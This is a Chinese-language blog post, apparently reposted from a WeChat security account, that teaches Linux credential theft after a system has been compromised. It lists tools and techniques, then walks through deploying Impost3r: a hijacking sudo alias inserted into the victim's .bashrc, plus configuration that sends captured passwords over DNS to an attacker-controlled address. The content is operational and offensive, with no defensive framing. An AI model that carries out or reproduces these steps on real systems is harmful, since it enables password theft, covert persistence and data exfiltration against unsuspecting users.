linux下的凭据窃取

在获取到linxu系统权限后，通常需要通过获取系统中的密码来得到系统或服务的合法权限，本次分享几种获取密码的方法。

方法一：mimipenguin获取密码

项目地址：https://github.com/huntergregal/mimipenguin

方法二：history历史命令查询

使用history命令查询历史命令中的密码信息，可以配合grep命令加快定位速度。

方法三：Shadow密码文件破解

当hash的开头为$1时，可通过md5解密获取密码

方法四：使用swap_digger破解系统密码

项目地址：https://github.com/sevagas/swap_digger

方法五：使用Impost3r获取系统密码

项目地址：https://github.com/ph4ntonn/Impost3r

首先进入用户账户目录下，找到.bashrc文件，添加以下代码

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

箭头所指的位置需要跟，后续生成的.impost3r文件放置的位置相同。

然后运行

source ~/.bashrc

接下来将整个 https://github.com/ph4ntonn/Impost3r 项目上传到目标主机上，进入到sudo文件夹下，然后编辑 main.h

/*
Custom setting
*/
# define FILENAME "/tmp/.impost3r" 设置Impost3r在目标服务器上的位置
# define BACKUP_ORI_FILENAME ".bashrc" 表明攻击者所备份的源用户配置文件是.bashrc还是.bash_profile、.profile、.bash_login
# define BACKUP_ORI_PATH "/tmp/.bashrc" 表明攻击者所备份的源用户配置文件在目标服务器上的位置
# define SAVE_OR_SEND 0 设置在窃取成功后是将结果保存在目标机器上或者是发送至攻击者控制的机器(发送=0，保存=1，默认为发送)
/*
Send to server
*/
# define YOUR_DOMAIN ".com" 注意，如果你不想购买一个域名来接收Impost3r回传的消息且被植入Impost3r的目标服务器并未禁止向你所控制的dns服务器的53端口的直接udp连接，那么这里的域名请使用默认值;
但是如果被植入Impost3r的目标服务器严格限制了dns请求的出站，那么请将YOUR_DOMAIN的值改为你所购买的域名，例如“.example.com”，并将这个域名的NS记录配置成你所控制的DNS服务器地址，在此DNS服务器上运行Fdns,并将下方REMOTE_ADDRESS的值更改为被植入Impost3r的目标服务器的默认dns地址,REMOTE_PORT更改为被植入Impost3r的目标服务器的默认dns地址所监听的dns服务端口(绝大多数情况下都是53端口)
# define MAX_RESEND 30 设置当窃取到密码之后，Impost3r向攻击者服务器发送用户密码的最大重试次数
# define RESEND_INTERVAL 5 设置每一次发送密码的间隔
# define REMOTE_ADDRESS "192.168.0.12" 设置回送密码的远程地址
# define REMOTE_PORT 53 设置回送密码的远程端口
/*
Save to local
*/
# define SAVE_LOCATION "/tmp/.cache" 设置结果文件保存的位置，在SAVE_OR_SEND设置为1的情况下

这里我们关注下SAVE_OR_SEND选项，将其设置为 0 ，然后修改 REMOTE_ADDRESS 为自己的监听服务器，这里要注意，监听的服务器上面要开启 dns 服务，默认为 53 端口，无需修改。

FILENAME的路径需要跟上面图片里箭头的路径相同，本文都放在 /tmp/ 文件夹下。

然后保存，之后运行make，接下来便会在当前目录生成 .impost3r

将其复制到/tmp/目录下，等到目标账户用户进行 sudo 的时候，我们便可在监听服务器的 /var/mail 目录下获取到账户信息。

点“阅读原文”，访问无问社区

原文始发于微信公众号（白帽子社区团队）：linux下的凭据窃取